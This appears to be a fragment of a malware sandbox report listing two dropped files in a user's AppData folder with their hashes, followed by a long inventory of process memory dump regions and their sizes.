C:\Users\Admin\AppData\Roaming\rTxXs.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\rTxXs.vbs

Filesize
128B

MD5
5fe69cd2b6edb477628d594b6dd25939

SHA1
f0866d2b5760fa843cb289e1facec7e62afb0fcd

SHA256
bf79f9f255e32c2e77f89ff8f40fd80a83a830b90f1ebb4f1ffce22de454692b

SHA512
1b21828a22d0bf75309b9c5cae234b0ede054bcc1f3058aeef6b473e9ba150b99b491c7510a7367d5e3a951c00787b4dce6de86855aab20e932d8087a49aba99

Download Submit
memory/1684-217-0x0000000005650000-0x0000000005660000-memory.dmp

Filesize
64KB

Download
memory/1684-285-0x0000000005650000-0x0000000005660000-memory.dmp

Filesize
64KB

Download
memory/1684-162-0x0000000005650000-0x0000000005660000-memory.dmp

Filesize
64KB

Download
memory/1684-163-0x0000000005650000-0x0000000005660000-memory.dmp

Filesize
64KB

Download
memory/1684-283-0x0000000006CD0000-0x0000000006CF2000-memory.dmp

Filesize
136KB

Download
memory/1684-284-0x0000000008080000-0x0000000008624000-memory.dmp

Filesize
5.6MB

Download
memory/1684-218-0x0000000005650000-0x0000000005660000-memory.dmp

Filesize
64KB

Download
memory/2160-310-0x0000000004FE0000-0x0000000004FF0000-memory.dmp

Filesize
64KB

Download
memory/2160-311-0x0000000004FE0000-0x0000000004FF0000-memory.dmp

Filesize
64KB

Download
memory/2160-313-0x0000000070530000-0x000000007057C000-memory.dmp

Filesize
304KB

Download
memory/2160-323-0x000000007F010000-0x000000007F020000-memory.dmp

Filesize
64KB

Download
memory/2160-324-0x0000000004FE0000-0x0000000004FF0000-memory.dmp

Filesize
64KB

Download
memory/2416-184-0x0000000006230000-0x0000000006262000-memory.dmp

Filesize
200KB

Download
memory/2416-185-0x0000000070530000-0x000000007057C000-memory.dmp

Filesize
304KB

Download
memory/2416-202-0x00000000072B0000-0x00000000072B8000-memory.dmp

Filesize
32KB

Download
memory/2416-197-0x0000000006FF0000-0x0000000006FFA000-memory.dmp

Filesize
40KB

Download
memory/2416-196-0x0000000006210000-0x000000000622E000-memory.dmp

Filesize
120KB

Download
memory/2416-198-0x00000000071F0000-0x0000000007286000-memory.dmp

Filesize
600KB

Download
memory/2416-201-0x00000000072D0000-0x00000000072EA000-memory.dmp

Filesize
104KB

Download
memory/2416-200-0x00000000071C0000-0x00000000071CE000-memory.dmp

Filesize
56KB

Download
memory/2416-161-0x0000000000FA0000-0x0000000000FB0000-memory.dmp

Filesize
64KB

Download
memory/2416-183-0x0000000000FA0000-0x0000000000FB0000-memory.dmp

Filesize
64KB

Download
memory/2416-186-0x000000007FAE0000-0x000000007FAF0000-memory.dmp

Filesize
64KB

Download
memory/2892-230-0x000000007F000000-0x000000007F010000-memory.dmp

Filesize
64KB

Download
memory/2892-216-0x0000000003110000-0x0000000003120000-memory.dmp

Filesize
64KB

Download
memory/2892-231-0x0000000003110000-0x0000000003120000-memory.dmp

Filesize
64KB

Download
memory/2892-220-0x0000000070530000-0x000000007057C000-memory.dmp

Filesize
304KB

Download
memory/3012-348-0x00000000029C0000-0x00000000029D0000-memory.dmp

Filesize
64KB

Download
memory/3012-349-0x00000000029C0000-0x00000000029D0000-memory.dmp

Filesize
64KB

Download
memory/3012-271-0x00000000029C0000-0x00000000029D0000-memory.dmp

Filesize
64KB

Download
memory/3012-272-0x00000000029C0000-0x00000000029D0000-memory.dmp

Filesize
64KB

Download
memory/3012-286-0x00000000029C0000-0x00000000029D0000-memory.dmp

Filesize
64KB

Download
memory/3012-352-0x00000000029C0000-0x00000000029D0000-memory.dmp

Filesize
64KB

Download
memory/3176-337-0x0000000000FE0000-0x0000000000FF0000-memory.dmp

Filesize
64KB

Download
memory/3176-336-0x0000000000FE0000-0x0000000000FF0000-memory.dmp

Filesize
64KB

Download
memory/3176-338-0x0000000070530000-0x000000007057C000-memory.dmp

Filesize
304KB

Download
memory/3176-350-0x000000007FB60000-0x000000007FB70000-memory.dmp

Filesize
64KB

Download
memory/3740-378-0x0000000002780000-0x0000000002790000-memory.dmp

Filesize
64KB

Download
memory/3740-376-0x0000000002780000-0x0000000002790000-memory.dmp

Filesize
64KB

Download
memory/4524-374-0x0000000002C80000-0x0000000002C90000-memory.dmp

Filesize
64KB

Download
memory/4524-309-0x0000000002C80000-0x0000000002C90000-memory.dmp

Filesize
64KB

Download
memory/4524-308-0x0000000002C80000-0x0000000002C90000-memory.dmp

Filesize
64KB

Download
memory/4524-375-0x0000000002C80000-0x0000000002C90000-memory.dmp

Filesize
64KB

Download
memory/4544-158-0x00000000062D0000-0x00000000062EA000-memory.dmp

Filesize
104KB

Download
memory/4544-138-0x00000000027B0000-0x00000000027C0000-memory.dmp

Filesize
64KB

Download
memory/4544-143-0x00000000055C0000-0x0000000005626000-memory.dmp

Filesize
408KB

Download
memory/4544-153-0x00000000027B0000-0x00000000027C0000-memory.dmp

Filesize
64KB

Download
memory/4544-154-0x00000000027B0000-0x00000000027C0000-memory.dmp

Filesize
64KB

Download
memory/4544-155-0x0000000005CA0000-0x0000000005CBE000-memory.dmp

Filesize
120KB

Download
memory/4544-182-0x00000000027B0000-0x00000000027C0000-memory.dmp

Filesize
64KB

Download
memory/4544-156-0x00000000027B0000-0x00000000027C0000-memory.dmp

Filesize
64KB

Download
memory/4544-157-0x00000000076E0000-0x0000000007D5A000-memory.dmp

Filesize
6.5MB

Download
memory/4544-137-0x0000000002810000-0x0000000002846000-memory.dmp

Filesize
216KB

Download
memory/4544-141-0x0000000004E60000-0x0000000004E82000-memory.dmp

Filesize
136KB

Download
memory/4544-140-0x00000000027B0000-0x00000000027C0000-memory.dmp

Filesize
64KB

Download
memory/4544-139-0x0000000004F90000-0x00000000055B8000-memory.dmp

Filesize
6.2MB

Download
memory/4544-142-0x0000000004F00000-0x0000000004F66000-memory.dmp

Filesize
408KB

Download
memory/4648-256-0x000000007F2E0000-0x000000007F2F0000-memory.dmp

Filesize
64KB

Download
memory/4648-244-0x0000000002DF0000-0x0000000002E00000-memory.dmp

Filesize
64KB

Download
memory/4648-246-0x0000000070530000-0x000000007057C000-memory.dmp

Filesize
304KB

Download
memory/4648-245-0x0000000002DF0000-0x0000000002E00000-memory.dmp

Filesize
64KB

Download
memory/4648-257-0x0000000002DF0000-0x0000000002E00000-memory.dmp

Filesize
64KB

Download